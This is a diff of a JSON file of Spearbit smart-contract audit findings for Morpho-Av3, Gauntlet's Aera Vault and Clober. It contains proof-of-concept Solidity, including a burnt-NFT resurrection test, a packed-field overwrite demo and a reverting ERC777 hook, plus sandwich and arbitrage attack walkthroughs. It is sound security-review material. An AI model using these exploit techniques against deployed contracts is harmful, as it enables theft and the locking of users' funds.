"Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "approveManagerWithSig user experience could be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "With the current implementation of approveManagerWithSig, signers must wait until the previous signers' nonces have been consumed before being able to call approveManagerWithSig. Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator. This means that signatures that use a \"future\" nonce cannot be approved until the previous nonces have been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: a delegator wants to allow 2 managers via signature 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no one executes approveManagerWithSig(sig_0), sig_1 (and all the signatures based on incremented nonces) cannot be executed.
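One common way to remove this ordering constraint, sketched here with hypothetical names and not part of Morpho's code, is Permit2-style unordered nonces, where each signature consumes an independent bit of a bitmap:

abstract contract UnorderedNonces {
    mapping(address => mapping(uint256 => uint256)) private _nonceBitmap;

    function _useUnorderedNonce(address signer, uint256 nonce) internal {
        uint256 wordPos = nonce >> 8;      // which 256-bit word
        uint256 bit = 1 << (nonce & 0xff); // which bit inside that word
        uint256 flipped = _nonceBitmap[signer][wordPos] ^= bit;
        // if the bit was already set, the xor cleared it and this check fails
        require(flipped & bit != 0, "nonce already used");
    }
}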
It's true that at some point someone/the signer will execute it.", + "title": "Group claim clashing condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The claim functionality is designed to support 3rd-party operators claiming multiple orders on behalf of the market's users, to finalise the transactions, deliver assets and earn bounties. The code iterates over a list of orders to execute _claim. function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall { uint32 totalBounty = 0; for (uint256 i = 0; i < orderKeys.length; i++) { ... (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim( queue, mOrder, orderKey, claimer ); ... } } However, neither the claim nor the _claim function in OrderBook supports skipping already fulfilled orders. On the contrary, in case of a revert in _claim the whole transaction is reverted. function _claim(...) private returns (...) { ... require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM); ... } Such an implementation does not fully support the initial idea of 3rd-party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen, for instance, when two bots get overlapping lists of orders, or when the owner of an order decides to claim or cancel it manually while a bot is about to claim it as well.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Missing user markets check when liquidating", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets.", + "title": "Order owner isn't zeroed after burning", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT to have been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call the approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero.
function testNFTMovementAfterBurn() public { _createOrderBook(0, 0); address attacker2 = address(0x1337); // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3 uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); uint256 tokenId = orderToken.encodeId(orderKey); // Step 2: burn 1 NFT by cancelling one of the orders vm.startPrank(Constants.MAKER); orderBook.cancel( Constants.MAKER, _toArray(orderKey) ); // verify ownership is still maker assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, \"NFT_OWNER\"); // Step 3: resurrect burnt token by calling safeTransferFrom orderToken.safeTransferFrom( Constants.MAKER, attacker2, tokenId ); // verify ownership is now attacker2 assertEq(orderToken.ownerOf(tokenId), attacker2, \"NFT_OWNER\"); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Consider reverting instead of returning zero inside the repayLogic, withdrawLogic, withdrawCollateralLogic and liquidateLogic functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The position manager always checks the user inputs via different validation functions. One of the validations is that the input's amount must be greater than zero; otherwise, the transaction reverts with revert Errors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic, after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); In this case, Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts is equal to zero.", + "title": "Lack of two-step role transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The contracts lack a two-step role transfer. Both the ownership transfer of the MarketFactory and the change of a market's host are implemented as single-step functions. Basic validation that the address for a market is not the zero address is performed; however, the case where the address receiving the role is inaccessible is not covered properly. Taking into account that handOverHost can be invoked without any supervision, by anyone who created the market, a typo can be made unintentionally, or intentionally if an attacker simply wants to brick fee collection, as the host currently gates collectFees in OrderBook (described as a separate issue).
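A minimal two-step sketch (hypothetical names; OpenZeppelin's Ownable2Step follows the same pattern), where the role only moves once the receiving address proves it is accessible:

contract TwoStepHost {
    address private _host;
    address private _pendingHost;

    function handOverHost(address newHost) external {
        require(msg.sender == _host, "ACCESS");
        _pendingHost = newHost; // no effect until accepted
    }

    function acceptHost() external {
        require(msg.sender == _pendingHost, "ACCESS");
        _host = msg.sender;
        _pendingHost = address(0);
    }
}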
The ownership transfer should, in theory, be less error-prone, as it should be done by the DAO with great care; still, a two-step role transfer is preferable there as well.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Both Morpho.sol and PositionsManager.sol use the Permit2 lib. The current implementation of the permit2 lib explicitly restricts the token amount to uint160 by calling amount.toUint160() On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib.", + "title": "Atomic fees delivery susceptible to funds lockout", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The collectFees function delivers the quoteToken part of the fees as well as the baseToken part of the fees atomically and simultaneously to both the DAO and the host. In case a single address is, for instance, blacklisted (e.g. via the USDC blacklist feature), or a token in a pair happens to be malicious and is configured in a way that a transfer to one of the addresses reverts, it is possible to block fee delivery. function collectFees() external nonReentrant { // @audit delivers both tokens atomically require(msg.sender == _host(), Errors.ACCESS); if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION; uint256 hostFeeAmount = amount - daoFeeAmount; _transferToken(token, _daoTreasury(), daoFeeAmount); _transferToken(token, _host(), hostFeeAmount); } Such a situation can happen in multiple cases: for instance, a malicious host may want to block the function for the DAO, to prevent it from collecting at least the guaranteed valuable quoteToken, or a hacked DAO can swap the treasury to some invalid address and renounce ownership, bricking collectFees across multiple markets. Taking into account the current implementation, in case it is not possible to transfer tokens the problematic address must be swapped out; depending on the specific case, this might not be trivial.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Both _wrapETH and _unwrapAndTransferETH are not checking whether the amount of tokens is greater than zero.
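A minimal sketch of such a guard, assuming a _WETH immutable and the standard WETH deposit() interface (the function shape is hypothetical):

function _wrapETH(uint256 amount) internal {
    if (amount == 0) return; // or: revert Errors.AmountIsZero();
    _WETH.deposit{value: amount}();
}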
If the amount is equal to zero, Morpho should avoid making the external call, as in the sketch above, or simply revert.", + "title": "DAO fees potentially unavailable due to overly strict access control", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The collectFees function is guarded by an inline access-control require statement which prevents anyone except the host from invoking the function. Only the host of the market is authorized to invoke it, and thereby to effectively deliver all collected fees, including the part of the fees belonging to the DAO. function collectFees() external nonReentrant { require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } This access control is too strict and can lead to funds being locked permanently in the worst-case scenario. The host is a single point of failure: in case access to the wallet is lost, or the role is incorrectly transferred, the fees of both the host and the DAO will be locked.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Document further constraints on BucketDLL's insert and remove functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: insert: \"This function should not be called with an _id that is already in the list.\" Otherwise, it would overwrite the existing _id. remove: \"This function should not be called with an _id that is not in the list.\" Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty.", + "title": "OrderNFT ownership and market host transfers are done separately", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The market host is entitled to 80% of the fees collected, and is able to set the URI of the corresponding orderToken NFT. However, transferring the market host and the orderToken NFT is done separately. It is thus possible for a market host to transfer one but not the other.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Important Balancer fields can be overwritten by EndTime", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer's ManagedPool uses 32-bit values for startTime and endTime but it does not verify that those values fit within that range. Values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. Nevertheless, this function does not strip any excess bits, resulting in other fields stored in _miscData being overwritten. In the version that Aera Vault uses, only the \"restrict LP\" field can be overwritten: by carefully crafting the value of endTime, the \"restrict LP\" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function, while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team.
contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e // [ 64 bits | 1 bit | 32 bits | 32 bits | 119 bits | 7 bits | 1 bit ] // [ reserved | restrict LP | end time | start time | unused | total tokens | swap flag ] // |MSB LSB| function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET) ); // this converts the values to 32 bits ... } } In the latest version of ManagedPool many more fields can be overwritten, including: LP flag Fee end/Fee start Swap flag contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits | 1 bit | 31 bits | 1 bit | 31 bits | 64 bits | 32 bits | 32 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] // |MSB LSB| The following POC shows how fields can be manipulated. // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import \"hardhat/console.sol\"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; // [ 64 bits | 1 bit | 31 bits | 1 bit | 31 bits | 64 bits | 32 bits | 32 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] // |MSB LSB| uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; function insertUint32(bytes32 word,uint256 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word,bytes32 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) +
2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState,startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState,endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData,poolState,0); console.log(\"startTime\", decodeUint32(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 console.log(\"endTime\", decodeUint32(miscData, _WEIGHT_END_TIME_OFFSET)); // 3 console.log(\"endSwapFeePercentage\", decodeUint64(miscData, _END_SWAP_FEE_PERCENTAGE_OFFSET)); // 4 console.log(\"Fee startTime\", decodeUint31(miscData, _FEE_START_TIME_OFFSET)); // 5 console.log(\"Swap enabled\", decodeBool(miscData, _SWAP_ENABLED_OFFSET)); // true console.log(\"Fee endTime\", decodeUint31(miscData, _FEE_END_TIME_OFFSET)); // 6 console.log(\"AllowlistLP\", decodeBool(miscData, _MUST_ALLOWLIST_LPS_OFFSET)); // true console.log(\"Swap fee percentage\", decodeUint64(poolState, _SWAP_FEE_PERCENTAGE_OFFSET)); // 7 console.log(\"Swap fee percentage\", decodeUint64(miscData, _SWAP_FEE_PERCENTAGE_OFFSET)); // 0 due to miscData conversion } }", + "title": "OrderNFTs can be renamed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, a malicious market host suddenly renaming tokens could lead to web2 phishing attacks.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Critical Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "sweep function should prevent Treasury from withdrawing pools BPTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault, including BPTs (Balancer Pool Tokens) that have been minted by the Vault during the pool's initialDeposit() function call. The current vault implementation does not need those BPTs to withdraw funds because they are passed directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to: Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls. Withdraw funds without respecting Validator allowance() limits. Withdraw funds without paying the manager's fee for the last withdraw(). finalize the pool, withdrawing all funds and selling valueless BPTs on the market. Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds. Swap fees would not be paid, because the Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, subsequently calling setSwapFee(0) to remove the swap fee, which would be applied during an exitPool() event. Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool().", + "title": "DOSing _replaceStaleOrder() due to reverting on token transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "In the case of tokens with implemented hooks, a malicious order owner can revert on the token-received event and thus cause a denial of service via _replaceStaleOrder().
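For illustration, an ERC777-style recipient hook of the following shape (registration via the ERC1820 registry omitted) is all an order owner needs to make the payout, and therefore _replaceStaleOrder(), revert:

contract BlockingOrderOwner {
    // ERC777 tokensReceived hook: reverting here blocks any token delivery
    // to this address, so the stale order can never be finalized.
    function tokensReceived(
        address, // operator
        address, // from
        address, // to
        uint256, // amount
        bytes calldata, // userData
        bytes calldata  // operatorData
    ) external pure {
        revert("payout rejected");
    }
}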
The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Critical Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Manager can cause an immediate weight change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer's ManagedPool uses 32-bit values for startTime and endTime but it does not verify that those values fit within that range. When endTime is set to 2**32 it becomes larger than startTime, so the _require(startTime <= endTime, ...) statement will not revert. When endTime is converted to 32 bits it will get a value of 0, so in _calculateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach the end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities. Note: startTime is also subject to this overflow problem. Note: the same issues occur in the latest version of ManagedPool. Note: This issue has been reported to Balancer by the Spearbit team. Also see the following issues: Managed Pools are still undergoing development and may contain bugs and/or change significantly Important fields of Balancer can be overwritten by EndTime contract ManagedPool is BaseWeightedPool, ReentrancyGuard { function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) { ... uint256 currentTime = block.timestamp; startTime = Math.max(currentTime, startTime); _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if endTime == 2**32 ... _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens); } function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, _END_TIME_OFFSET) ); // this converts the values to 32 bits ... } function _calculateWeightChangeProgress() private view returns (uint256) { uint256 currentTime = block.timestamp; bytes32 poolState = _getMiscData(); uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET); uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET); if (currentTime >= endTime) { // will be true if endTime == (2**32) capped to 32 bits == 0 return FixedPoint.ONE; } else ... ... } }", + "title": "Total claimable bounties may exceed type(uint32).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Individual bounties are capped to type(uint32).max, which is ~4.295 of a native token with 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of the Polygon network) for their sum to therefore exceed type(uint32).max.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "deposit and withdraw functions are susceptible to sandwich attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Transactions calling the deposit() function are susceptible to sandwich attacks where an attacker can extract value from deposits. A similar issue exists in the withdraw() function, but the minimum check on the pool holdings limits the attack's impact. Consider the following scenario (swap fees ignored for simplicity): 1.
Suppose the Balancer pool contains two tokens, WETH and DAI, and weights are 0.5 and 0.5. Currently, there is 1 WETH and 3k DAI in the pool and the WETH spot price is 3k. 2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function. 3. The attacker front-runs the Treasury's transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because the WETH and DAI balances become 0.5 and 6k, WETH's spot price now becomes 12k. 4. Now, the Treasury's transaction adds 3k DAI into the Balancer pool and updates the weights to 0.5*1.5 : 0.5 = 0.6 : 0.4. 5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (and recovers WETH's spot price to near but above 3k). According to the current weights, they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (2^0.4)^(1/0.6). 6. As a result the attacker profits 3.33k - 3k = 0.33k DAI.", + "title": "Can fake market order in TakeOrder event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Market orders in Orderbook.marketOrder set the 8-th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with this 8-th bit set and spoof a market order event.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "allowance() doesn't limit withdraw()s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective. function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory allowances = validator.allowance(); ... for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable(... ); } } } // can't update state due to view function allowance() external view override returns (uint256[] memory amounts) { amounts = new uint256[](count); for (uint256 i = 0; i < count; i++) { amounts[i] = ANY_AMOUNT; } }", + "title": "_priceToIndex will revert if price is type(uint128).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Because price is of type uint128, the increment will overflow before it is cast to uint256: uint256 shiftedPrice = uint256(price + 1) << 64;", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Malicious manager could cause Vault funds to be inaccessible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The calculateAndDistributeManagerFees() function pushes tokens to the manager, and if this action fails for unknown reasons the entire Vault would be blocked and funds would become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore finalize() as well.
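As a minimal sketch of this coupling (simplified and hypothetical, not the exact vault source), every user-facing entry point first distributes fees, so a single failing token transfer blocks them all:

function withdraw(uint256[] calldata amounts) external onlyOwner {
    // Fee distribution runs first; if the safeTransfer to the manager reverts,
    // this entire entry point becomes unusable.
    calculateAndDistributeManagerFees();
    // ... actual withdrawal logic would follow here
}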
Within calculateAndDistributeManagerFees() the function safeTransfer() is the riskiest and could fail under the following situations: A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly. A token with a blacklist option is used and the manager is blacklisted. For example USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exists that he is malicious and his address could be blacklisted in USDC. Note: set as high risk because although the probability is very small, the impact results in Vault funds becoming inaccessible. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < amounts.length; i++) { tokens[i].safeTransfer(manager, amounts[i]); } }", + "title": "using block.chainid for create2 salt can be problematic if there's a chain hardfork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Using block.chainid as the salt for create2 can result in inconsistency if there is a chain split event (e.g. the eth2 merge). This would produce two different chains with different chain ids (one with the original chain id and one with a new value), which would leave one of the chains unable to interact with the markets and NFTs properly. It also makes fork testing, which changes the chainid of the local environment, harder to do.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "updateWeightsGradually allows change rates to start in the past with a very high maximumRatio", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current updateWeightsGradually is using startTime instead of the minimal start time, which should be Math.max(block.timestamp, startTime). Because internally Balancer will use startTime = Math.max(currentTime, startTime); as the startTime, this allows to: Have a startTime in the past. Have a targetWeights[i] higher than allowed. We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check it is still needed in the Aera implementation to prevent transactions from reverting because of an underflow error on uint256 duration = endTime - startTime;", + "title": "Use get64Unsafe() when updating claimable in take()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "get64Unsafe() can be used when fetching the stored claimable value since _getClaimableIndex() returns elementIndex < 4.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "The vault manager has unchecked power to create arbitrage using setSwapFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "A previously known issue was that a malicious vault manager could arbitrage the vault as in the scenario below: 1. Set the swap fees to a high value by setSwapFee (10% is the maximum). 2. Wait for the market price to move against the spot price. 3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault. The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_PERCENT_CHANGE each time.
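Note that a relative per-call cap composes multiplicatively: n capped calls can move the fee by a factor of up to (1 + cap)^n. A hypothetical sketch of chaining such calls in one transaction (the vault, getSwapFee and targetFee names are assumed, not from the codebase):

// Hypothetical: step the fee toward an arbitrary target, one capped change at a time.
uint256 fee = vault.getSwapFee();
while (fee < targetFee) {
    fee = Math.min((fee * (ONE + MAXIMUM_SWAP_FEE_PERCENT_CHANGE)) / ONE, targetFee);
    vault.setSwapFee(fee); // each individual call respects the per-call cap
}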
However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want.", + "title": "Checking if zero is cheaper than checking if the result is a concrete value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Checking if the result is zero vs. checking if the result is/isn't a concrete value should save 1 opcode.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Implement a function to claim liquidity mining rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancer offers a liquidity mining rewards distribution for liquidity providers. Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquidity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances which are stored in a Merkle tree. Claiming through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards, and when claiming multiple tokens. The AeraVault is itself the only liquidity provider of the Balancer pool deployed, so each week it's entitled to claim those rewards. Currently, those rewards cannot be claimed because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever.", + "title": "Function argument can be skipped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The address caller parameter in the internal _cancel function can be replaced with msg.sender as effectively this is the value that is actually used when the function is invoked.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Gas Optimization" ] }, { - "title": "Owner can circumvent allowance() via enableTradingWithWeights()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The vault Owner can set arbitrary weights via disableTrading() and then call enableTradingWithWeights() to set the spot price and create arbitrage opportunities for himself. This way the allowance() checks in withdraw(), which limit the amount of funds an owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time. Also see the following issues: allowance() doesn't limit withdraw()s; enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled; Separation of concerns Owner and Manager. function disableTrading() ... onlyOwnerOrManager ... { setSwapEnabled(false); } function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... { ... pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); } function enableTradingRiskingArbitrage() ... onlyOwner ...
